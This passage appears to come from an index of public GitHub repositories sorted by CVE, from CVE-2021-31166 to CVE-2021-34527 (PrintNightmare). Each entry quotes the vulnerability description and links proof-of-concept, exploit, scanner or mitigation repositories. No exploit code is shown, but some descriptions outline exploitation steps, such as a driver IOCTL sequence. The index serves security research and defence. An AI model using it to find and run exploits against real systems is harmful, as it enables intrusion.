- [ZZ-SOCMAP/CVE-2021-31166](https://github.com/ZZ-SOCMAP/CVE-2021-31166)
- [imikoYa/CVE-2021-31166-exploit](https://github.com/imikoYa/CVE-2021-31166-exploit)
- [mauricelambert/CVE-2021-31166](https://github.com/mauricelambert/CVE-2021-31166)
- [0xmaximus/Home-Demolisher](https://github.com/0xmaximus/Home-Demolisher)

### CVE-2021-31184 (2021-05-11)

Microsoft Windows Infrared Data Association (IrDA) Information Disclosure Vulnerability

- [waleedassar/CVE-2021-31184](https://github.com/waleedassar/CVE-2021-31184)

### CVE-2021-31233 (2023-05-31)

SQL Injection vulnerability found in Fighting Cock Information System v.1.0 allows a remote attacker to obtain sensitive information via the edit_breed.php parameter.

- [gabesolomon/CVE-2021-31233](https://github.com/gabesolomon/CVE-2021-31233)

### CVE-2021-31290
- [qaisarafridi/cve-2021-31290](https://github.com/qaisarafridi/cve-2021-31290)

### CVE-2021-31589 (2022-01-05)

A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.

- [karthi-the-hacker/CVE-2021-31589](https://github.com/karthi-the-hacker/CVE-2021-31589)

### CVE-2021-31630 (2021-08-03)

Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.

- [hev0x/CVE-2021-31630-OpenPLC_RCE](https://github.com/hev0x/CVE-2021-31630-OpenPLC_RCE)
- [Hunt3r0x/CVE-2021-31630-HTB](https://github.com/Hunt3r0x/CVE-2021-31630-HTB)
- [thewhiteh4t/cve-2021-31630](https://github.com/thewhiteh4t/cve-2021-31630)
- [behindsecurity/htb-wifinetictwo-exploit](https://github.com/behindsecurity/htb-wifinetictwo-exploit)
- [mind2hex/CVE-2021-31630](https://github.com/mind2hex/CVE-2021-31630)
- [sealldeveloper/CVE-2021-31630-PoC](https://github.com/sealldeveloper/CVE-2021-31630-PoC)
- [junnythemarksman/CVE-2021-31630](https://github.com/junnythemarksman/CVE-2021-31630)
- [adibabdala123/cve-2021-31630](https://github.com/adibabdala123/cve-2021-31630)
- [manuelsantosiglesias/CVE-2021-31630](https://github.com/manuelsantosiglesias/CVE-2021-31630)
- [FlojBoj/CVE-2021-31630](https://github.com/FlojBoj/CVE-2021-31630)

### CVE-2021-31728 (2021-05-17)

Incorrect access control in zam64.sys and zam32.sys in MalwareFox AntiMalware 2.74.0.150 allows a non-privileged process to open a handle to `\\.\ZemanaAntiMalware`, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook with IOCTL 0x80002044, and execute the executable memory through this hook with IOCTL 0x80002014 or 0x80002018. This exposes ring 0 code execution in the context of the driver, allowing the non-privileged process to elevate privileges.

- [irql/CVE-2021-31728](https://github.com/irql/CVE-2021-31728)

### CVE-2021-31755 (2021-05-07)

An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.

- [r3s3tt/CVE-2021-31755](https://github.com/r3s3tt/CVE-2021-31755)

### CVE-2021-31760 (2021-04-25)

Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to achieve Remote Command Execution (RCE) through Webmin's running process feature.

- [Mesh3l911/CVE-2021-31760](https://github.com/Mesh3l911/CVE-2021-31760)
- [electronicbots/CVE-2021-31760](https://github.com/electronicbots/CVE-2021-31760)

### CVE-2021-31761 (2021-04-25)

Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.

- [Mesh3l911/CVE-2021-31761](https://github.com/Mesh3l911/CVE-2021-31761)
- [electronicbots/CVE-2021-31761](https://github.com/electronicbots/CVE-2021-31761)

### CVE-2021-31762 (2021-04-25)

Webmin 1.973 is affected by Cross Site Request Forgery (CSRF) to create a privileged user through Webmin's add users feature, and then get a reverse shell through Webmin's running process feature.

- [Mesh3l911/CVE-2021-31762](https://github.com/Mesh3l911/CVE-2021-31762)
- [electronicbots/CVE-2021-31762](https://github.com/electronicbots/CVE-2021-31762)

### CVE-2021-31796 (2021-09-02)

An inadequate encryption vulnerability discovered in CyberArk Credential Provider before 12.1 may lead to Information Disclosure. An attacker may realistically have enough information that the number of possible keys (for a credential file) is only one, and the number is usually not higher than 2^36.

- [unmanarc/CACredDecoder](https://github.com/unmanarc/CACredDecoder)

### CVE-2021-31800 (2021-05-05)

Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.

- [p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write](https://github.com/p0dalirius/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write)
- [Louzogh/CVE-2021-31800](https://github.com/Louzogh/CVE-2021-31800)

### CVE-2021-31805 (2022-04-12)

The fix issued for CVE-2020-17530 was incomplete, so from Apache Struts 2.0.0 to 2.5.29, some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to Remote Code Execution and security degradation.

- [pyroxenites/s2-062](https://github.com/pyroxenites/s2-062)
- [Wrin9/CVE-2021-31805](https://github.com/Wrin9/CVE-2021-31805)
- [Axx8/Struts2_S2-062_CVE-2021-31805](https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805)
- [jax7sec/S2-062](https://github.com/jax7sec/S2-062)
- [aeyesec/CVE-2021-31805](https://github.com/aeyesec/CVE-2021-31805)
- [fleabane1/CVE-2021-31805-POC](https://github.com/fleabane1/CVE-2021-31805-POC)
- [z92g/CVE-2021-31805](https://github.com/z92g/CVE-2021-31805)
- [nth347/CVE-2021-31805](https://github.com/nth347/CVE-2021-31805)

### CVE-2021-31856 (2021-04-28)

A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).

- [ssst0n3/CVE-2021-31856](https://github.com/ssst0n3/CVE-2021-31856)

### CVE-2021-31862 (2021-10-29)

SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication.

- [RobertDra/CVE-2021-31862](https://github.com/RobertDra/CVE-2021-31862)

### CVE-2021-31955 (2021-06-08)

Windows Kernel Information Disclosure Vulnerability

- [freeide/CVE-2021-31955-POC](https://github.com/freeide/CVE-2021-31955-POC)

### CVE-2021-31956 (2021-06-08)

Windows NTFS Elevation of Privilege Vulnerability

- [hzshang/CVE-2021-31956](https://github.com/hzshang/CVE-2021-31956)
- [aazhuliang/CVE-2021-31956-EXP](https://github.com/aazhuliang/CVE-2021-31956-EXP)
- [Y3A/CVE-2021-31956](https://github.com/Y3A/CVE-2021-31956)
- [hoangprod/CVE-2021-31956-POC](https://github.com/hoangprod/CVE-2021-31956-POC)

### CVE-2021-32099 (2021-05-07)

A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass.

- [zjicmDarkWing/CVE-2021-32099](https://github.com/zjicmDarkWing/CVE-2021-32099)
- [ibnuuby/CVE-2021-32099](https://github.com/ibnuuby/CVE-2021-32099)
- [l3eol3eo/CVE-2021-32099_SQLi](https://github.com/l3eol3eo/CVE-2021-32099_SQLi)
- [akr3ch/CVE-2021-32099](https://github.com/akr3ch/CVE-2021-32099)

### CVE-2021-32156 (2022-04-11)

A cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.

- [Mesh3l911/CVE-2021-32156](https://github.com/Mesh3l911/CVE-2021-32156)

### CVE-2021-32157 (2022-04-11)

A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Scheduled Cron Jobs feature.

- [Mesh3l911/CVE-2021-32157](https://github.com/Mesh3l911/CVE-2021-32157)
- [dnr6419/CVE-2021-32157](https://github.com/dnr6419/CVE-2021-32157)

### CVE-2021-32158 (2022-04-11)

A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 via the Upload and Download feature.

- [Mesh3l911/CVE-2021-32158](https://github.com/Mesh3l911/CVE-2021-32158)

### CVE-2021-32159 (2022-04-11)

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 via the Upload and Download feature.

- [Mesh3l911/CVE-2021-32159](https://github.com/Mesh3l911/CVE-2021-32159)

### CVE-2021-32160 (2022-04-11)

A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the Add Users feature.

- [Mesh3l911/CVE-2021-32160](https://github.com/Mesh3l911/CVE-2021-32160)

### CVE-2021-32161 (2022-04-11)

A Cross-Site Scripting (XSS) vulnerability exists in Webmin 1.973 through the File Manager feature.

- [Mesh3l911/CVE-2021-32161](https://github.com/Mesh3l911/CVE-2021-32161)

### CVE-2021-32162 (2022-04-11)

A Cross-site request forgery (CSRF) vulnerability exists in Webmin 1.973 through the File Manager feature.

- [Mesh3l911/CVE-2021-32162](https://github.com/Mesh3l911/CVE-2021-32162)

### CVE-2021-32305 (2021-05-18)

WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

- [sz-guanx/CVE-2021-32305](https://github.com/sz-guanx/CVE-2021-32305)
- [FredBrave/CVE-2021-32305-websvn-2.6.0](https://github.com/FredBrave/CVE-2021-32305-websvn-2.6.0)

### CVE-2021-32399 (2021-05-10)

net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller.

- [nanopathi/linux-4.19.72_CVE-2021-32399](https://github.com/nanopathi/linux-4.19.72_CVE-2021-32399)

### CVE-2021-32471 (2021-05-10)

Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. For example, a tape head may have an unexpected location after the processing of input composed of As and Bs (instead of 0s and 1s). NOTE: the discoverer states "this vulnerability has no real-world implications."

- [intrinsic-propensity/turing-machine](https://github.com/intrinsic-propensity/turing-machine)

### CVE-2021-32537 (2021-07-07)

Realtek HAD contains a driver crash vulnerability that allows local attackers to send a special string to the kernel driver from user mode. Due to the unexpected commands, the kernel driver causes a system crash.

- [0vercl0k/CVE-2021-32537](https://github.com/0vercl0k/CVE-2021-32537)

### CVE-2021-32644 (2021-06-22)

Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering, versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3.

- [dnr6419/CVE-2021-32644](https://github.com/dnr6419/CVE-2021-32644)

### CVE-2021-32648 (2021-08-26)

octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.

- [Immersive-Labs-Sec/CVE-2021-32648](https://github.com/Immersive-Labs-Sec/CVE-2021-32648)
- [daftspunk/CVE-2021-32648](https://github.com/daftspunk/CVE-2021-32648)

### CVE-2021-32682 (2021-06-14)

elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.

- [nickswink/CVE-2021-32682](https://github.com/nickswink/CVE-2021-32682)

### CVE-2021-32708 (2021-06-24)

Flysystem is an open source file storage library for PHP. The whitespace normalisation used in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: a user is allowed to supply the path or filename of an uploaded file; the supplied path or filename is not checked against unicode chars; the supplied pathname is checked against an extension deny-list, not an allow-list; the supplied path or filename contains a unicode whitespace char in the extension; and the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met, a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.

- [fazilbaig1/CVE-2021-32708](https://github.com/fazilbaig1/CVE-2021-32708)

### CVE-2021-32724 (2021-09-09)

check-spelling is a github action which provides CI spell checking. In affected versions and for a repository with the [check-spelling action](https://github.com/marketplace/actions/check-spelling) enabled that triggers on `pull_request_target` (or `schedule`), an attacker can send a crafted Pull Request that causes a `GITHUB_TOKEN` to be exposed. With the `GITHUB_TOKEN`, it's possible to push commits to the repository bypassing standard approval processes. Commits to the repository could then steal any/all secrets available to the repository. As a workaround, users can either [Disable the workflow](https://docs.github.com/en/actions/managing-workflow-runs/disabling-and-enabling-a-workflow) until you've fixed all branches, or set the repository to [Allow specific actions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#allowing-specific-actions-to-run). check-spelling isn't a verified creator and it certainly won't be anytime soon. You could then explicitly add other actions that your repository uses. Set repository [Workflow permissions](https://docs.github.com/en/github/administering-a-repository/managing-repository-settings/disabling-or-limiting-github-actions-for-a-repository#setting-the-permissions-of-the-github_token-for-your-repository) to `Read repository contents permission`. Workflows using `check-spelling/check-spelling@main` will get the fix automatically. Workflows using a pinned sha or tagged version will need to change the affected workflows for all repository branches to the latest version. Users can verify who and which Pull Requests have been running the action by looking up the spelling.yml action in the Actions tab of their repositories, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml. You can filter PRs by adding ?query=event%3Apull_request_target, e.g., https://github.com/check-spelling/check-spelling/actions/workflows/spelling.yml?query=event%3Apull_request_target.

- [MaximeSchlegel/CVE-2021-32724-Target](https://github.com/MaximeSchlegel/CVE-2021-32724-Target)

### CVE-2021-32789 (2021-07-26)

woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin from version 2.5.0 up to, but not including, version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read-only SQL query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.

- [and0x00/CVE-2021-32789](https://github.com/and0x00/CVE-2021-32789)
- [DonVorrin/CVE-2021-32789](https://github.com/DonVorrin/CVE-2021-32789)

### CVE-2021-32804 (2021-08-03)

The npm package "tar" (aka node-tar) before versions 6.1.1, 5.0.6, 4.4.14, and 3.3.2 has an arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. This issue was addressed in releases 3.2.2, 4.4.14, 5.0.6 and 6.1.1. Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. See referenced GitHub Advisory for details. Be aware of CVE-2021-32803 which fixes a similar bug in later versions of tar.

- [yamory/CVE-2021-32804](https://github.com/yamory/CVE-2021-32804)

### CVE-2021-32819 (2021-05-14)

Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.

- [Abady0x1/CVE-2021-32819](https://github.com/Abady0x1/CVE-2021-32819)

### CVE-2021-32849 (2022-01-26)

Gerapy is a distributed crawler management framework. Prior to version 0.9.9, an authenticated user could execute arbitrary commands. This issue is fixed in version 0.9.9. There are no known workarounds.

- [bb33bb/CVE-2021-32849](https://github.com/bb33bb/CVE-2021-32849)
- [lowkey0808/cve-2021-32849](https://github.com/lowkey0808/cve-2021-32849)

### CVE-2021-33026 (2021-05-13)

The Flask-Caching extension through 1.10.1 for Flask relies on Pickle for serialization, which may lead to remote code execution or local privilege escalation. If an attacker gains access to cache storage (e.g., filesystem, Memcached, Redis, etc.), they can construct a crafted payload, poison the cache, and execute Python code. NOTE: a third party indicates that exploitation is extremely unlikely unless the machine is already compromised; in other cases, the attacker would be unable to write their payload to the cache and generate the required collision.

- [CarlosG13/CVE-2021-33026](https://github.com/CarlosG13/CVE-2021-33026)
- [Agilevatester/FlaskCache_CVE-2021-33026_POC](https://github.com/Agilevatester/FlaskCache_CVE-2021-33026_POC)

### CVE-2021-33034 (2021-05-14)

In the Linux kernel before 5.12.4, net/bluetooth/hci_event.c has a use-after-free when destroying an hci_chan, aka CID-5c4c8c954409. This leads to writing an arbitrary value.

- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034)

### CVE-2021-33044 (2021-09-15)

An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

- [bp2008/DahuaLoginBypass](https://github.com/bp2008/DahuaLoginBypass)
- [Spy0x7/CVE-2021-33044](https://github.com/Spy0x7/CVE-2021-33044)
- [Alonzozzz/alonzzzo](https://github.com/Alonzozzz/alonzzzo)
- [haingn/LoHongCam-CVE-2021-33044](https://github.com/haingn/LoHongCam-CVE-2021-33044)

### CVE-2021-33045 (2021-09-15)

An identity authentication bypass vulnerability was found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

- [dongpohezui/cve-2021-33045](https://github.com/dongpohezui/cve-2021-33045)

### CVE-2021-33104 (2023-02-16)

Improper access control in the Intel(R) OFU software before version 14.1.28 may allow an authenticated user to potentially enable denial of service via local access.

- [rjt-gupta/CVE-2021-33104](https://github.com/rjt-gupta/CVE-2021-33104)

### CVE-2021-33558 (2021-05-27)

Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.

- [mdanzaruddin/CVE-2021-33558.](https://github.com/mdanzaruddin/CVE-2021-33558.)
- [anldori/CVE-2021-33558](https://github.com/anldori/CVE-2021-33558)

### CVE-2021-33560 (2021-06-08)

Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.

- [IBM/PGP-client-checker-CVE-2021-33560](https://github.com/IBM/PGP-client-checker-CVE-2021-33560)

### CVE-2021-33564 (2021-05-29)

An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

- [mlr0p/CVE-2021-33564](https://github.com/mlr0p/CVE-2021-33564)
- [dorkerdevil/CVE-2021-33564](https://github.com/dorkerdevil/CVE-2021-33564)

### CVE-2021-33624 (2021-06-23)

In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db.

- [benschlueter/CVE-2021-33624](https://github.com/benschlueter/CVE-2021-33624)

### CVE-2021-33690 (2021-09-15)

Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions 7.11, 7.20, 7.30, 7.31, 7.40, 7.50. The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on the server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability. Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.

- [redrays-io/CVE-2021-33690](https://github.com/redrays-io/CVE-2021-33690)

### CVE-2021-33699 (2021-08-10)

Task Hijacking is a vulnerability that affects applications running on Android devices due to a misconfiguration of the Task Control features in their AndroidManifest.xml. This allows an unauthorized attacker or malware to take over legitimate apps and steal the user's sensitive information.

- [naroSEC/CVE-2021-33699_Task_Hijacking](https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking)

### CVE-2021-33739 (2021-06-08)

Microsoft DWM Core Library Elevation of Privilege Vulnerability

- [freeide2017/CVE-2021-33739-POC](https://github.com/freeide2017/CVE-2021-33739-POC)
- [giwon9977/CVE-2021-33739_PoC_Analysis](https://github.com/giwon9977/CVE-2021-33739_PoC_Analysis)

### CVE-2021-33766 (2021-07-14)

Microsoft Exchange Server Information Disclosure Vulnerability

- [bhdresh/CVE-2021-33766](https://github.com/bhdresh/CVE-2021-33766)
- [demossl/CVE-2021-33766-ProxyToken](https://github.com/demossl/CVE-2021-33766-ProxyToken)

### CVE-2021-33831 (2021-09-07)

api/account/register in the TH Wildau COVID-19 Contact Tracing application through 2021-09-01 has Incorrect Access Control. An attacker can interfere with tracing of infection chains by creating 500 random users within 2500 seconds.

- [lanmarc77/CVE-2021-33831](https://github.com/lanmarc77/CVE-2021-33831)

### CVE-2021-33879 (2021-06-06)

Tencent GameLoop before 4.1.21.90 downloaded updates over an insecure HTTP connection. A malicious attacker in an MITM position could spoof the contents of an XML document describing an update package, replacing a download URL with one pointing to an arbitrary Windows executable. Because the only integrity check would be a comparison of the downloaded file's MD5 checksum to the one contained within the XML document, the downloaded executable would then be executed on the victim's machine.

- [mmiszczyk/cve-2021-33879](https://github.com/mmiszczyk/cve-2021-33879)

### CVE-2021-33909 (2021-07-20)

fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05.

- [Liang2580/CVE-2021-33909](https://github.com/Liang2580/CVE-2021-33909)
- [baerwolf/cve-2021-33909](https://github.com/baerwolf/cve-2021-33909)
- [bbinfosec43/CVE-2021-33909](https://github.com/bbinfosec43/CVE-2021-33909)
- [ChrisTheCoolHut/CVE-2021-33909](https://github.com/ChrisTheCoolHut/CVE-2021-33909)

### CVE-2021-33959 (2023-01-18)

Plex Media Server 1.21 and before is vulnerable to a DDoS reflection attack via the Plex service.

- [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959)

### CVE-2021-34045
- [Al1ex/CVE-2021-34045](https://github.com/Al1ex/CVE-2021-34045)
- [kenuosec/CVE-2021-34045](https://github.com/kenuosec/CVE-2021-34045)

### CVE-2021-34371 (2021-08-05)

Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.

- [zwjjustdoit/CVE-2021-34371.jar](https://github.com/zwjjustdoit/CVE-2021-34371.jar)

### CVE-2021-34428 (2021-06-22)

For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in.

- [Trinadh465/jetty_9.4.31_CVE-2021-34428](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-34428)

### CVE-2021-34429 (2021-07-15)

For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.

- [ColdFusionX/CVE-2021-34429](https://github.com/ColdFusionX/CVE-2021-34429)

### CVE-2021-34470 (2021-07-14)

Microsoft Exchange Server Elevation of Privilege Vulnerability

- [technion/CVE-2021-34470scanner](https://github.com/technion/CVE-2021-34470scanner)

### CVE-2021-34473 (2021-07-14)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [cyberheartmi9/Proxyshell-Scanner](https://github.com/cyberheartmi9/Proxyshell-Scanner)
- [RaouzRouik/CVE-2021-34473-scanner](https://github.com/RaouzRouik/CVE-2021-34473-scanner)
- [p2-98/CVE-2021-34473](https://github.com/p2-98/CVE-2021-34473)
- [horizon3ai/proxyshell](https://github.com/horizon3ai/proxyshell)
- [je6k/CVE-2021-34473-Exchange-ProxyShell](https://github.com/je6k/CVE-2021-34473-Exchange-ProxyShell)
- [learningsurface/ProxyShell-CVE-2021-34473.py](https://github.com/learningsurface/ProxyShell-CVE-2021-34473.py)
- [kh4sh3i/ProxyShell](https://github.com/kh4sh3i/ProxyShell)
- [ipsBruno/CVE-2021-34473-NMAP-SCANNER](https://github.com/ipsBruno/CVE-2021-34473-NMAP-SCANNER)
- [f4alireza/CVE](https://github.com/f4alireza/CVE)

### CVE-2021-34481 (2021-07-16)

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

**UPDATE** August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. This security update changes the Point and Print default behavior; please see [KB5005652](https://support.microsoft.com/help/5005652).

- [vpn28/CVE-2021-34481](https://github.com/vpn28/CVE-2021-34481)

### CVE-2021-34486 (2021-08-12)

Windows Event Tracing Elevation of Privilege Vulnerability

- [KaLendsi/CVE-2021-34486](https://github.com/KaLendsi/CVE-2021-34486)
- [b1tg/CVE-2021-34486-exp](https://github.com/b1tg/CVE-2021-34486-exp)

### CVE-2021-34496 (2021-07-14)

Windows GDI Information Disclosure Vulnerability

- [dja2TaqkGEEfA45/CVE-2021-34496](https://github.com/dja2TaqkGEEfA45/CVE-2021-34496)

### CVE-2021-34523 (2021-07-14)

Microsoft Exchange Server Elevation of Privilege Vulnerability

- [mithridates1313/ProxyShell_POC](https://github.com/mithridates1313/ProxyShell_POC)
- [SUPRAAA-1337/CVE-2021-34523](https://github.com/SUPRAAA-1337/CVE-2021-34523)

### CVE-2021-34527 (2021-07-02)

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 has been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.

In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (**Note**: These registry keys do not exist by default, and therefore are already at the secure setting.), and also that your Group Policy settings are correct (see FAQ):

- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
- NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
- UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

**Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.**

UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also [KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates](https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7).

Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as "PrintNightmare", documented in CVE-2021-34527.

- [DenizSe/CVE-2021-34527](https://github.com/DenizSe/CVE-2021-34527)
- [thomas-lauer/PrintNightmare](https://github.com/thomas-lauer/PrintNightmare)
- [JohnHammond/CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527)
- [nemo-wq/PrintNightmare-CVE-2021-34527](https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527)
- [CnOxx1/CVE-2021-34527-1675](https://github.com/CnOxx1/CVE-2021-34527-1675)
- [rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint](https://github.com/rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint)
- [geekbrett/CVE-2021-34527-PrintNightmare-Workaround](https://github.com/geekbrett/CVE-2021-34527-PrintNightmare-Workaround)
- [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream)
- [vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527](https://github.com/vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527)
- [powershellpr0mpt/PrintNightmare-CVE-2021-34527](https://github.com/powershellpr0mpt/PrintNightmare-CVE-2021-34527)
- [WidespreadPandemic/CVE-2021-34527_ACL_mitigation](https://github.com/WidespreadPandemic/CVE-2021-34527_ACL_mitigation)
- [glorisonlai/printnightmare](https://github.com/glorisonlai/printnightmare)
- [dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC](https://github.com/dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC)
- [Eutectico/Printnightmare](https://github.com/Eutectico/Printnightmare)
